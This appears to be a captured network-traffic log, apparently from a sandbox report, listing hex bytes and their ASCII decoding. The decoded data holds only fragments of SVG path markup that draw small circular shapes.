                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6325INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                  Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6341INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6357INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                  Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6373INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6389INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                  Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6405INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6421INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                  Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6437INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6453INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                  Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6469INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6485INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6501INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6517INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                  Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6533INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6549INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                  Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6565INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6581INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                  Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
